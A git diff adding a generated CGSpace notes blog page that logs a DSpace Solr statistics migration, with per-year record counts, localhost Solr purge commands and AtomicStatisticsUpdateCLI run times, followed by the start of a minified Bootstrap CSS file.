+<p>Processing the statistics-2016 core:</p>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2016
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span><span style="display:flex;"><span>        *** Statistics Records with Legacy Id ***
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>           1,765,924    Bistream View
+</span></span><span style="display:flex;"><span>           1,151,575    Item View
+</span></span><span style="display:flex;"><span>             187,110    Community View
+</span></span><span style="display:flex;"><span>              51,204    Collection View
+</span></span><span style="display:flex;"><span>             347,382    Community Search
+</span></span><span style="display:flex;"><span>              66,605    Collection Search
+</span></span><span style="display:flex;"><span>             620,298    Unexpected Type &amp; Full Site
+</span></span><span style="display:flex;"><span>        --------------------------------------
+</span></span><span style="display:flex;"><span>           4,190,098    TOTAL
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span></code></pre></div><ul>
+<li>849,408: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
+<li>627,747: <code>id:/.+-unmigrated/</code></li>
+<li>1,477,155: <code>*:* NOT id:/.{36}/</code></li>
+<li>1,469,706 are <code>type: 5</code> (SITE) so we can purge them:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2016/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
+</span></span></code></pre></div><h2 id="statistics-2015">statistics-2015</h2>
+<p>Processing the statistics-2015 core:</p>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2015
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span><span style="display:flex;"><span>        *** Statistics Records with Legacy Id ***
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>             990,916    Bistream View
+</span></span><span style="display:flex;"><span>             506,070    Item View
+</span></span><span style="display:flex;"><span>             116,153    Community View
+</span></span><span style="display:flex;"><span>              33,282    Collection View
+</span></span><span style="display:flex;"><span>              21,062    Community Search
+</span></span><span style="display:flex;"><span>              10,788    Collection Search
+</span></span><span style="display:flex;"><span>              52,107    Unexpected Type &amp; Full Site
+</span></span><span style="display:flex;"><span>        --------------------------------------
+</span></span><span style="display:flex;"><span>           1,730,378    TOTAL
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span></code></pre></div><p>Summary of stats after processing:</p>
+<ul>
+<li>195,293: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
+<li>67,146: <code>id:/.+-unmigrated/</code></li>
+<li>262,439: <code>*:* NOT id:/.{36}/</code></li>
+<li>247,400 are <code>type: 5</code> (SITE) so we can purge them:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2015/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
+</span></span></code></pre></div><h2 id="statistics-2014">statistics-2014</h2>
+<p>Processing the statistics-2014 core:</p>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2014
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span><span style="display:flex;"><span>        *** Statistics Records with Legacy Id ***
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>           2,381,603    Item View
+</span></span><span style="display:flex;"><span>           1,323,357    Bistream View
+</span></span><span style="display:flex;"><span>             501,545    Community View
+</span></span><span style="display:flex;"><span>             247,805    Collection View
+</span></span><span style="display:flex;"><span>                 250    Collection Search
+</span></span><span style="display:flex;"><span>                 188    Community Search
+</span></span><span style="display:flex;"><span>                  50    Item Search
+</span></span><span style="display:flex;"><span>              10,918    Unexpected Type &amp; Full Site
+</span></span><span style="display:flex;"><span>        --------------------------------------
+</span></span><span style="display:flex;"><span>           4,465,716    TOTAL
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span></code></pre></div><p>Summary of unmigrated documents after processing:</p>
+<ul>
+<li>182,131: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
+<li>39,947: <code>id:/.+-unmigrated/</code></li>
+<li>222,078: <code>*:* NOT id:/.{36}/</code></li>
+<li>188,791 are <code>type: 5</code> (SITE) so we can purge them:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2014/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
+</span></span></code></pre></div><h2 id="statistics-2013">statistics-2013</h2>
+<p>Processing the statistics-2013 core:</p>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2013
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span><span style="display:flex;"><span>        *** Statistics Records with Legacy Id ***
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>           2,352,124    Item View
+</span></span><span style="display:flex;"><span>           1,117,676    Bistream View
+</span></span><span style="display:flex;"><span>             575,711    Community View
+</span></span><span style="display:flex;"><span>             171,639    Collection View
+</span></span><span style="display:flex;"><span>                 248    Item Search
+</span></span><span style="display:flex;"><span>                   7    Collection Search
+</span></span><span style="display:flex;"><span>                   5    Community Search
+</span></span><span style="display:flex;"><span>               1,452    Unexpected Type &amp; Full Site
+</span></span><span style="display:flex;"><span>        --------------------------------------
+</span></span><span style="display:flex;"><span>           4,218,862    TOTAL
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span></code></pre></div><p>Summary of unmigrated docs after processing:</p>
+<ul>
+<li>2,548 : <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
+<li>29,772: <code>id:/.+-unmigrated/</code></li>
+<li>32,320: <code>*:* NOT id:/.{36}/</code></li>
+<li>15,691 are <code>type: 5</code> (SITE) so we can purge them:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2013/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
+</span></span></code></pre></div><h2 id="statistics-2012">statistics-2012</h2>
+<p>Processing the statistics-2012 core:</p>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2012
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span><span style="display:flex;"><span>        *** Statistics Records with Legacy Id ***
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>           2,229,332    Item View
+</span></span><span style="display:flex;"><span>             913,577    Bistream View
+</span></span><span style="display:flex;"><span>             215,577    Collection View
+</span></span><span style="display:flex;"><span>             104,734    Community View
+</span></span><span style="display:flex;"><span>        --------------------------------------
+</span></span><span style="display:flex;"><span>           3,463,220    TOTAL
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span></code></pre></div><p>Summary of unmigrated docs after processing:</p>
+<ul>
+<li>0: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
+<li>33,161: <code>id:/.+-unmigrated/</code></li>
+<li>33,161: <code>*:* NOT id:/.{36}/</code></li>
+<li>33,161 are <code>type: 3</code> (COLLECTION), which is different than I&rsquo;ve seen previously&hellip; but I suppose I still have to purge them because there will be errors in the Atmire modules otherwise:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2012/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
+</span></span></code></pre></div><h2 id="statistics-2011">statistics-2011</h2>
+<p>Processing the statistics-2011 core:</p>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2011
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span><span style="display:flex;"><span>        *** Statistics Records with Legacy Id ***
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>             904,896    Item View
+</span></span><span style="display:flex;"><span>             385,789    Bistream View
+</span></span><span style="display:flex;"><span>             154,356    Collection View
+</span></span><span style="display:flex;"><span>              62,978    Community View
+</span></span><span style="display:flex;"><span>        --------------------------------------
+</span></span><span style="display:flex;"><span>           1,508,019    TOTAL
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span></code></pre></div><p>Summary of unmigrated docs after processing:</p>
+<ul>
+<li>0: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
+<li>17,551: <code>id:/.+-unmigrated/</code></li>
+<li>17,551: <code>*:* NOT id:/.{36}/</code></li>
+<li>12,116 are <code>type: 3</code> (COLLECTION), which is different than I&rsquo;ve seen previously&hellip; but I suppose I still have to purge them because there will be errors in the Atmire modules otherwise:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2011/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
+</span></span></code></pre></div><h2 id="statistics-2010">statistics-2010</h2>
+<p>Processing the statistics-2010 core:</p>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2010
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span><span style="display:flex;"><span>        *** Statistics Records with Legacy Id ***
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>              26,067    Item View
+</span></span><span style="display:flex;"><span>              15,615    Bistream View
+</span></span><span style="display:flex;"><span>               4,116    Collection View
+</span></span><span style="display:flex;"><span>               1,094    Community View
+</span></span><span style="display:flex;"><span>        --------------------------------------
+</span></span><span style="display:flex;"><span>              46,892    TOTAL
+</span></span><span style="display:flex;"><span>=================================================================
+</span></span></code></pre></div><p>Summary of unmigrated docs after processing:</p>
+<ul>
+<li>0: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
+<li>1,012: <code>id:/.+-unmigrated/</code></li>
+<li>1,012: <code>*:* NOT id:/.{36}/</code></li>
+<li>654 are <code>type: 3</code> (COLLECTION), which is different than I&rsquo;ve seen previously&hellip; but I suppose I still have to purge them because there will be errors in the Atmire modules otherwise:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2010/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
+</span></span></code></pre></div><h3 id="processing-solr-statistics-with-atomicstatisticsupdatecli">Processing Solr statistics with AtomicStatisticsUpdateCLI</h3>
+<p>On 2020-11-18 I finished processing the Solr statistics with solr-upgrade-statistics-6x and I started processing them with AtomicStatisticsUpdateCLI.</p>
+<h2 id="statistics-1">statistics</h2>
+<p>First the current year&rsquo;s statistics core, in 12-hour batches:</p>
+<pre tabindex="0"><code>$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics
+</code></pre><p>It took ~38 hours to finish processing this core.</p>
+<h2 id="statistics-2019-1">statistics-2019</h2>
+<p>The statistics-2019 core, in 12-hour batches:</p>
+<pre tabindex="0"><code>$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2019
+</code></pre><p>It took ~32 hours to finish processing this core.</p>
+<h2 id="statistics-2018-1">statistics-2018</h2>
+<p>The statistics-2018 core, in 12-hour batches:</p>
+<pre tabindex="0"><code>$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2018
+</code></pre><p>It took ~28 hours to finish processing this core.</p>
+<h2 id="statistics-2017-1">statistics-2017</h2>
+<p>The statistics-2017 core, in 12-hour batches:</p>
+<pre tabindex="0"><code>$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2017
+</code></pre><p>It took ~24 hours to finish processing this core.</p>
+<h2 id="statistics-2016-1">statistics-2016</h2>
+<p>The statistics-2016 core, in 12-hour batches:</p>
+<pre tabindex="0"><code>$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2016
+</code></pre><p>It took ~20 hours to finish processing this core.</p>
+<h2 id="statistics-2015-1">statistics-2015</h2>
+<p>The statistics-2015 core, in 12-hour batches:</p>
+<pre tabindex="0"><code>$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2015
+</code></pre><p>It took ~21 hours to finish processing this core.</p>
+<h2 id="statistics-2014-1">statistics-2014</h2>
+<p>The statistics-2014 core, in 12-hour batches:</p>
+<pre tabindex="0"><code>$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2014
+</code></pre><p>It took ~12 hours to finish processing this core.</p>
+<h2 id="statistics-2013-1">statistics-2013</h2>
+<p>The statistics-2013 core, in 12-hour batches:</p>
+<pre tabindex="0"><code>$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2013
+</code></pre><p>It took ~3 hours to finish processing this core.</p>
+<h2 id="statistics-2012-1">statistics-2012</h2>
+<p>The statistics-2012 core, in 12-hour batches:</p>
+<pre tabindex="0"><code>$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2012
+</code></pre><p>It took ~2 hours to finish processing this core.</p>
+<h2 id="statistics-2011-1">statistics-2011</h2>
+<p>The statistics-2011 core, in 12-hour batches:</p>
+<pre tabindex="0"><code>$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2011
+</code></pre><p>It took 1 hour to finish processing this core.</p>
+<h2 id="statistics-2010-1">statistics-2010</h2>
+<p>The statistics-2010 core, in 12-hour batches:</p>
+<pre tabindex="0"><code>$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2010
+</code></pre><p>It took five minutes to finish processing this core.</p>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css b/docs/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css
new file mode 100644
index 000000000..63f08e049
--- /dev/null
+++ b/docs/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css
@@ -0,0 +1,6 @@
+@charset "UTF-8";/*!
+ * Bootstrap v4.6.0 (https://getbootstrap.com/)
+ * Copyright 2011-2021 The Bootstrap Authors
+ * Copyright 2011-2021 Twitter, Inc.
+ * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE)
+ */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans","Liberation Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:border-box}html{font-family:sans-serif;line-height:1.15;-webkit-text-size-adjust:100%;-webkit-tap-highlight-color:transparent}article,aside,figcaption,figure,footer,header,hgroup,main,nav,section{display:block}body{margin:0;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans","Liberation Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";font-size:1rem;font-weight:400;line-height:1.5;color:#212529;text-align:left;background-color:#fff}[tabindex="-1"]:focus:not(:focus-visible){outline:0!important}hr{box-sizing:content-box;height:0;overflow:visible}h1,h2,h3,h4,h5,h6{margin-top:0;margin-bottom:.5rem}p{margin-top:0;margin-bottom:1rem}abbr[data-original-title],abbr[title]{text-decoration:underline;text-decoration:underline dotted;cursor:help;border-bottom:0;text-decoration-skip-ink:none}address{margin-bottom:1rem;font-style:normal;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}b,strong{font-weight:bolder}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}a{color:#007bff;text-decoration:none;background-color:transparent}a:hover{color:#0056b3;text-decoration:underline}a:not([href]):not([class]){color:inherit;text-decoration:none}a:not([href]):not([class]):hover{color:inherit;text-decoration:none}code,kbd,pre,samp{font-family:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;font-size:1em}pre{margin-top:0;margin-bottom:1rem;overflow:auto;-ms-overflow-style:scrollbar}figure{margin:0 0 1rem}img{vertical-align:middle;border-style:none}svg{overflow:hidden;vertical-align:middle}table{border-collapse:collapse}caption{padding-top:.75rem;padding-bottom:.75rem;color:#6c757d;text-align:left;caption-side:bottom}th{text-align:inherit;text-align:-webkit-match-parent}label{display:inline-block;margin-bottom:.5rem}button{border-radius:0}button:focus:not(:focus-visible){outline:0}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,input{overflow:visible}button,select{text-transform:none}[role=button]{cursor:pointer}select{word-wrap:normal}[type=button],[type=reset],[type=submit],button{-webkit-appearance:button}[type=button]:not(:disabled),[type=reset]:not(:disabled),[type=submit]:not(:disabled),button:not(:disabled){cursor:pointer}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{padding:0;border-style:none}input[type=checkbox],input[type=radio]{box-sizing:border-box;padding:0}textarea{overflow:auto;resize:vertical}fieldset{min-width:0;padding:0;margin:0;border:0}legend{display:block;width:100%;max-width:100%;padding:0;margin-bottom:.5rem;font-size:1.5rem;line-height:inherit;color:inherit;white-space:normal}progress{vertical-align:baseline}[type=number]::-webkit-inner-spin-button,[type=number]::-webkit-outer-spin-button{height:auto}[type=search]{outline-offset:-2px;-webkit-appearance:none}[type=search]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{font:inherit;-webkit-appearance:button}output{display:inline-block}summary{display:list-item;cursor:pointer}template{display:none}[hidden]{display:none!important}.h1,.h2,.h3,.h4,.h5,.h6,h1,h2,h3,h4,h5,h6{margin-bottom:.5rem;font-weight:500;line-height:1.2}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size:1.25rem;font-weight:300}.display-1{font-size:6rem;font-weight:300;line-height:1.2}.display-2{font-size:5.5rem;font-weight:300;line-height:1.2}.display-3{font-size:4.5rem;font-weight:300;line-height:1.2}.display-4{font-size:3.5rem;font-weight:300;line-height:1.2}hr{margin-top:1rem;margin-bottom:1rem;border:0;border-top:1px solid rgba(0,0,0,.1)}.small,small{font-size:.875em;font-weight:400}.mark,mark{padding:.2em;background-color:#fcf8e3}.list-unstyled{padding-left:0;list-style:none}.list-inline{padding-left:0;list-style:none}.list-inline-item{display:inline-block}.list-inline-item:not(:last-child){margin-right:.5rem}.initialism{font-size:90%;text-transform:uppercase}.blockquote{margin-bottom:1rem;font-size:1.25rem}.blockquote-footer{display:block;font-size:.875em;color:#6c757d}.blockquote-footer::before{content:"— "}.img-fluid{max-width:100%;height:auto}.img-thumbnail{padding:.25rem;background-color:#fff;border:1px solid #dee2e6;border-radius:.25rem;max-width:100%;height:auto}.figure{display:inline-block}.figure-img{margin-bottom:.5rem;line-height:1}.figure-caption{font-size:90%;color:#6c757d}code{font-size:87.5%;color:#e83e8c;word-wrap:break-word}a>code{color:inherit}kbd{padding:.2rem .4rem;font-size:87.5%;color:#fff;background-color:#212529;border-radius:.2rem}kbd kbd{padding:0;font-size:100%;font-weight:700}pre{display:block;font-size:87.5%;color:#212529}pre code{font-size:inherit;color:inherit;word-break:normal}.pre-scrollable{max-height:340px;overflow-y:scroll}.container,.container-fluid,.container-lg,.container-md,.container-sm,.container-xl{width:100%;padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}@media (min-width:576px){.container,.container-sm{max-width:540px}}@media (min-width:768px){.container,.container-md,.container-sm{max-width:720px}}@media (min-width:992px){.container,.container-lg,.container-md,.container-sm{max-width:960px}}@media (min-width:1200px){.container,.container-lg,.container-md,.container-sm,.container-xl{max-width:1140px}}.row{display:flex;flex-wrap:wrap;margin-right:-15px;margin-left:-15px}.no-gutters{margin-right:0;margin-left:0}.no-gutters>.col,.no-gutters>[class*=col-]{padding-right:0;padding-left:0}.col,.col-1,.col-10,.col-11,.col-12,.col-2,.col-3,.col-4,.col-5,.col-6,.col-7,.col-8,.col-9,.col-auto,.col-lg,.col-lg-1,.col-lg-10,.col-lg-11,.col-lg-12,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9,.col-lg-auto,.col-md,.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-auto,.col-sm,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-sm-auto,.col-xl,.col-xl-1,.col-xl-10,.col-xl-11,.col-xl-12,.col-xl-2,.col-xl-3,.col-xl-4,.col-xl-5,.col-xl-6,.col-xl-7,.col-xl-8,.col-xl-9,.col-xl-auto{position:relative;width:100%;padding-right:15px;padding-left:15px}.col{flex-basis:0;flex-grow:1;max-width:100%}.row-cols-1>*{flex:0 0 100%;max-width:100%}.row-cols-2>*{flex:0 0 50%;max-width:50%}.row-cols-3>*{flex:0 0 33.3333333333%;max-width:33.3333333333%}.row-cols-4>*{flex:0 0 25%;max-width:25%}.row-cols-5>*{flex:0 0 20%;max-width:20%}.row-cols-6>*{flex:0 0 16.6666666667%;max-width:16.6666666667%}.col-auto{flex:0 0 auto;width:auto;max-width:100%}.col-1{flex:0 0 8.33333333%;max-width:8.33333333%}.col-2{flex:0 0 16.66666667%;max-width:16.66666667%}.col-3{flex:0 0 25%;max-width:25%}.col-4{flex:0 0 33.33333333%;max-width:33.33333333%}.col-5{flex:0 0 41.66666667%;max-width:41.66666667%}.col-6{flex:0 0 50%;max-width:50%}.col-7{flex:0 0 58.33333333%;max-width:58.33333333%}.col-8{flex:0 0 66.66666667%;max-width:66.66666667%}.col-9{flex:0 0 75%;max-width:75%}.col-10{flex:0 0 